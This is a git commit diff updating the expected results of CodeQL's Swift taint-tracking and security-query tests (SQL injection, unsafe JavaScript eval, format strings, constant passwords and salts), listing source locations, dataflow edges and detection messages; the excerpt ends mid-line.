conversions.swift:46:12:46:40 | call to Double.init(_:) | conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | result | | conversions.swift:47:12:47:40 | call to String.init(_:) | conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | result | @@ -547,7 +654,17 @@ subpaths | conversions.swift:59:13:59:13 | v | conversions.swift:58:13:58:32 | call to sourceInt(_:) | conversions.swift:59:13:59:13 | v | result | | conversions.swift:63:12:63:12 | v2 | conversions.swift:62:30:62:49 | call to sourceInt(_:) | conversions.swift:63:12:63:12 | v2 | result | | conversions.swift:66:12:66:12 | v4 | conversions.swift:65:31:65:50 | call to sourceInt(_:) | conversions.swift:66:12:66:12 | v4 | result | +| conversions.swift:69:12:69:12 | v5 | conversions.swift:68:36:68:55 | call to sourceInt(_:) | conversions.swift:69:12:69:12 | v5 | result | +| conversions.swift:72:12:72:12 | v6 | conversions.swift:71:28:71:47 | call to sourceInt(_:) | conversions.swift:72:12:72:12 | v6 | result | | conversions.swift:75:12:75:12 | v7 | conversions.swift:74:15:74:34 | call to sourceInt(_:) | conversions.swift:75:12:75:12 | v7 | result | +| conversions.swift:80:12:80:48 | call to advanced(by:) | conversions.swift:80:28:80:47 | call to sourceInt(_:) | conversions.swift:80:12:80:48 | call to advanced(by:) | result | +| conversions.swift:82:12:82:51 | call to distance(to:) | conversions.swift:82:28:82:50 | call to sourceUInt64(_:) | conversions.swift:82:12:82:51 | call to distance(to:) | result | +| conversions.swift:84:12:84:46 | ...! | conversions.swift:84:25:84:44 | call to sourceInt(_:) | conversions.swift:84:12:84:46 | ...! | result | +| conversions.swift:85:12:85:49 | ...! | conversions.swift:85:28:85:47 | call to sourceInt(_:) | conversions.swift:85:12:85:49 | ...! | result | +| conversions.swift:86:12:86:46 | call to Self.init(clamping:) | conversions.swift:86:26:86:45 | call to sourceInt(_:) | conversions.swift:86:12:86:46 | call to Self.init(clamping:) | result | +| conversions.swift:87:12:87:49 | call to Self.init(clamping:) | conversions.swift:87:29:87:48 | call to sourceInt(_:) | conversions.swift:87:12:87:49 | call to Self.init(clamping:) | result | +| conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:88:36:88:55 | call to sourceInt(_:) | conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | result | +| conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | conversions.swift:89:39:89:58 | call to sourceInt(_:) | conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | result | | conversions.swift:90:12:90:51 | ...! | conversions.swift:90:16:90:38 | call to sourceString(_:) | conversions.swift:90:12:90:51 | ...! | result | | conversions.swift:91:12:91:54 | ...! | conversions.swift:91:19:91:41 | call to sourceString(_:) | conversions.swift:91:12:91:54 | ...! | result | | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | conversions.swift:93:30:93:49 | call to sourceInt(_:) | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | result | @@ -560,6 +677,7 @@ subpaths | conversions.swift:100:12:100:36 | .bigEndian | conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | conversions.swift:100:12:100:36 | .bigEndian | result | | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | result | | conversions.swift:137:12:137:40 | call to Float.init(_:) | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | result | +| conversions.swift:138:12:138:40 | call to UInt8.init(_:) | conversions.swift:138:18:138:39 | call to sourceFloat(_:) | conversions.swift:138:12:138:40 | call to UInt8.init(_:) | result | | conversions.swift:139:12:139:41 | call to String.init(_:) | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | result | | conversions.swift:140:12:140:43 | .utf8 | conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:43 | .utf8 | result | | conversions.swift:141:12:141:43 | call to String.init(_:) | conversions.swift:141:19:141:42 | call to sourceFloat80(_:) | conversions.swift:141:12:141:43 | call to String.init(_:) | result | @@ -576,6 +694,10 @@ subpaths | conversions.swift:155:12:155:37 | .significand | conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | result | | conversions.swift:156:12:156:36 | .exponent | conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | result | | conversions.swift:157:12:157:36 | .significand | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | result | +| conversions.swift:158:12:158:34 | .byteSwapped | conversions.swift:158:12:158:32 | call to sourceUInt(_:) | conversions.swift:158:12:158:34 | .byteSwapped | result | +| conversions.swift:159:12:159:36 | .byteSwapped | conversions.swift:159:12:159:34 | call to sourceUInt64(_:) | conversions.swift:159:12:159:36 | .byteSwapped | result | +| conversions.swift:160:12:160:33 | .magnitude | conversions.swift:160:12:160:31 | call to sourceInt(_:) | conversions.swift:160:12:160:33 | .magnitude | result | +| conversions.swift:161:12:161:37 | .magnitude | conversions.swift:161:12:161:35 | call to sourceUInt64(_:) | conversions.swift:161:12:161:37 | .magnitude | result | | conversions.swift:165:12:165:35 | call to sourceString(_:) | conversions.swift:165:12:165:35 | call to sourceString(_:) | conversions.swift:165:12:165:35 | call to sourceString(_:) | result | | conversions.swift:166:12:166:43 | call to String.init(_:) | conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | result | | conversions.swift:175:12:175:12 | ms2 | conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:175:12:175:12 | ms2 | result | @@ -585,6 +707,7 @@ subpaths | conversions.swift:184:12:184:12 | parent | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:184:12:184:12 | parent | result | | conversions.swift:187:12:187:12 | v3 | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:187:12:187:12 | v3 | result | | conversions.swift:188:12:188:12 | v3 | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:188:12:188:12 | v3 | result | +| conversions.swift:196:12:196:42 | call to Self.init(_:) | conversions.swift:196:24:196:41 | call to sourceInt(_:) | conversions.swift:196:12:196:42 | call to Self.init(_:) | result | | conversions.swift:203:13:203:13 | arr1 | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:203:13:203:13 | arr1 | result | | conversions.swift:204:13:204:13 | arr2 | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:204:13:204:13 | arr2 | result | | conversions.swift:205:13:205:19 | ...[...] | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:205:13:205:19 | ...[...] | result | @@ -598,10 +721,12 @@ subpaths | conversions.swift:219:13:219:20 | ...[...] | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:219:13:219:20 | ...[...] | result | | conversions.swift:220:13:220:20 | ...[...] | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:220:13:220:20 | ...[...] | result | | conversions.swift:236:13:236:13 | withUInt | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:236:13:236:13 | withUInt | result | +| conversions.swift:238:12:238:12 | self | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:238:12:238:12 | self | result | | conversions.swift:242:13:242:25 | .v | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:242:13:242:25 | .v | result | | conversions.swift:248:13:248:26 | .v | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:248:13:248:26 | .v | result | | conversions.swift:251:12:251:12 | self | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:251:12:251:12 | self | result | | conversions.swift:255:13:255:25 | .v | conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:255:13:255:25 | .v | result | +| conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | result | | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | result | | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | result | | simple.swift:12:13:12:24 | ... .+(_:_:) ... | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... | result | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected index 0be7309f857..8ec8033d086 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected @@ -1,30 +1,2 @@ testFailures -| conversions.swift:33:39:34:1 | // $ tainted=conv1-2\n | Missing result: tainted=conv1-2 | -| conversions.swift:34:40:35:1 | // $ tainted=conv1-3\n | Missing result: tainted=conv1-3 | -| conversions.swift:35:41:36:1 | // $ tainted=conv1-4\n | Missing result: tainted=conv1-4 | -| conversions.swift:36:41:37:1 | // $ tainted=conv1-5\n | Missing result: tainted=conv1-5 | -| conversions.swift:37:41:38:1 | // $ tainted=conv1-6\n | Missing result: tainted=conv1-6 | -| conversions.swift:39:40:40:1 | // $ tainted=conv1-8\n | Missing result: tainted=conv1-8 | -| conversions.swift:40:41:41:1 | // $ tainted=conv1-9\n | Missing result: tainted=conv1-9 | -| conversions.swift:41:43:42:1 | // $ tainted=conv1-10\n | Missing result: tainted=conv1-10 | -| conversions.swift:42:43:43:1 | // $ tainted=conv1-11\n | Missing result: tainted=conv1-11 | -| conversions.swift:43:43:44:1 | // $ tainted=conv1-12\n | Missing result: tainted=conv1-12 | -| conversions.swift:69:16:70:1 | // $ tainted=conv3-4\n | Missing result: tainted=conv3-4 | -| conversions.swift:72:16:73:1 | // $ tainted=conv3-5\n | Missing result: tainted=conv3-5 | -| conversions.swift:80:51:81:1 | // $ tainted=conv3-7\n | Missing result: tainted=conv3-7 | -| conversions.swift:82:54:83:1 | // $ tainted=conv3-8\n | Missing result: tainted=conv3-8 | -| conversions.swift:84:49:85:1 | // $ tainted=conv4-1\n | Missing result: tainted=conv4-1 | -| conversions.swift:85:52:86:1 | // $ tainted=conv4-2\n | Missing result: tainted=conv4-2 | -| conversions.swift:86:49:87:1 | // $ tainted=conv4-3\n | Missing result: tainted=conv4-3 | -| conversions.swift:87:52:88:1 | // $ tainted=conv4-4\n | Missing result: tainted=conv4-4 | -| conversions.swift:88:59:89:1 | // $ tainted=conv4-5\n | Missing result: tainted=conv4-5 | -| conversions.swift:89:62:90:1 | // $ tainted=conv4-6\n | Missing result: tainted=conv4-6 | -| conversions.swift:138:43:139:1 | // $ tainted=conv7-3\n | Missing result: tainted=conv7-3 | -| conversions.swift:158:47:159:1 | // $ tainted=conv9-7\n | Missing result: tainted=conv9-7 | -| conversions.swift:159:49:160:1 | // $ tainted=conv9-8\n | Missing result: tainted=conv9-8 | -| conversions.swift:160:44:161:1 | // $ tainted=conv9-9\n | Missing result: tainted=conv9-9 | -| conversions.swift:161:48:162:1 | // $ tainted=conv9-10\n | Missing result: tainted=conv9-10 | -| conversions.swift:196:45:197:1 | // $ tainted=cenum\n | Missing result: tainted=cenum | -| conversions.swift:238:18:239:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | -| conversions.swift:262:47:263:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | failures From 6aa43e001dd8b4cfd0b0794836b43d15c3ce6609 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 17:24:42 +0000 Subject: [PATCH 0701/1267] Swift: Effect on other tests. --- .../taint/libraries/TaintInline.expected | 1 - .../Security/CWE-089/SqlInjection.expected | 14 ++++ .../Security/CWE-094/UnsafeJsEval.expected | 23 +++++++ .../CWE-134/UncontrolledFormatString.expected | 21 ++++++ .../CWE-259/ConstantPassword.expected | 25 +++++++ .../Security/CWE-611/XXETest.expected | 16 ----- .../Security/CWE-760/ConstantSalt.expected | 67 +++++++++++++++++++ 7 files changed, 150 insertions(+), 17 deletions(-) diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index bbe166c67ca..5fcb458d4fc 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -2,5 +2,4 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | | string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | -| string.swift:605:30:606:1 | // $ tainted=605\n | Missing result: tainted=605 | failures diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 36ebcd04a6e..9824b5c8e17 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected @@ -82,6 +82,7 @@ edges | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | provenance | | | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | provenance | | | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | provenance | | +| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:63:25:63:25 | remoteString | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | provenance | | @@ -97,6 +98,8 @@ edges | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | provenance | | +| SQLite.swift:63:21:63:37 | call to Self.init(_:) | SQLite.swift:77:17:77:17 | safeQuery2 | provenance | | +| SQLite.swift:63:25:63:25 | remoteString | SQLite.swift:63:21:63:37 | call to Self.init(_:) | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | provenance | | @@ -104,6 +107,7 @@ edges | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | provenance | | | other.swift:54:31:54:31 | remoteString | other.swift:54:14:54:43 | call to NSString.init(string:) | provenance | | +| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:123:25:123:25 | remoteString | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | provenance | | @@ -111,6 +115,8 @@ edges | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:189:13:189:13 | unsafeQuery3 | provenance | | +| sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | provenance | | +| sqlite3_c_api.swift:123:25:123:25 | remoteString | sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | provenance | | | sqlite3_c_api.swift:189:13:189:13 | unsafeQuery3 | sqlite3_c_api.swift:189:13:189:58 | call to data(using:allowLossyConversion:) | provenance | | | sqlite3_c_api.swift:189:13:189:58 | call to data(using:allowLossyConversion:) | sqlite3_c_api.swift:190:2:190:2 | data | provenance | | | sqlite3_c_api.swift:190:2:190:2 | data | sqlite3_c_api.swift:190:21:190:21 | [post] buffer | provenance | | @@ -214,9 +220,12 @@ nodes | GRDB.swift:350:69:350:69 | remoteString | semmle.label | remoteString | | GRDB.swift:351:84:351:84 | remoteString | semmle.label | remoteString | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | +| SQLite.swift:63:21:63:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| SQLite.swift:63:25:63:25 | remoteString | semmle.label | remoteString | | SQLite.swift:73:17:73:17 | unsafeQuery1 | semmle.label | unsafeQuery1 | | SQLite.swift:74:17:74:17 | unsafeQuery2 | semmle.label | unsafeQuery2 | | SQLite.swift:75:17:75:17 | unsafeQuery3 | semmle.label | unsafeQuery3 | +| SQLite.swift:77:17:77:17 | safeQuery2 | semmle.label | safeQuery2 | | SQLite.swift:83:29:83:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | | SQLite.swift:95:32:95:32 | remoteString | semmle.label | remoteString | | SQLite.swift:100:29:100:29 | unsafeQuery1 | semmle.label | unsafeQuery1 | @@ -238,9 +247,12 @@ nodes | other.swift:55:14:55:14 | remoteString | semmle.label | remoteString | | other.swift:57:16:57:16 | remoteString | semmle.label | remoteString | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | +| sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| sqlite3_c_api.swift:123:25:123:25 | remoteString | semmle.label | remoteString | | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | semmle.label | unsafeQuery1 | | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | semmle.label | unsafeQuery2 | | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | semmle.label | unsafeQuery3 | +| sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | semmle.label | safeQuery2 | | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | semmle.label | unsafeQuery3 | | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | @@ -339,6 +351,7 @@ subpaths | SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:77:17:77:17 | safeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:77:17:77:17 | safeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | @@ -360,6 +373,7 @@ subpaths | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected b/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected index cfd68d818ef..64a65dd1a54 100644 --- a/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected +++ b/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected @@ -30,6 +30,17 @@ edges | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | UnsafeJsEval.swift:285:13:285:13 | string | provenance | | | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | UnsafeJsEval.swift:299:13:299:13 | string | provenance | | | UnsafeJsEval.swift:214:24:214:24 | remoteData | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:265:13:265:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:268:13:268:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:276:13:276:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:279:13:279:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:285:13:285:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:299:13:299:13 | string | provenance | | +| UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | provenance | | +| UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | provenance | | +| UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | provenance | | +| UnsafeJsEval.swift:217:35:217:63 | try! ... | UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | provenance | | +| UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:217:35:217:63 | try! ... | provenance | | | UnsafeJsEval.swift:265:13:265:13 | string | UnsafeJsEval.swift:266:43:266:43 | string | provenance | | | UnsafeJsEval.swift:266:43:266:43 | string | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | provenance | | | UnsafeJsEval.swift:268:13:268:13 | string | UnsafeJsEval.swift:269:43:269:43 | string | provenance | | @@ -63,6 +74,12 @@ nodes | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | semmle.label | call to String.init(decoding:as:) | | UnsafeJsEval.swift:214:24:214:24 | remoteData | semmle.label | remoteData | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | semmle.label | ... .+(_:_:) ... | +| UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | semmle.label | ... ??(_:_:) ... | +| UnsafeJsEval.swift:217:35:217:63 | try! ... | semmle.label | try! ... | +| UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | | UnsafeJsEval.swift:265:13:265:13 | string | semmle.label | string | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | semmle.label | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | | UnsafeJsEval.swift:266:43:266:43 | string | semmle.label | string | @@ -97,24 +114,30 @@ subpaths | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to 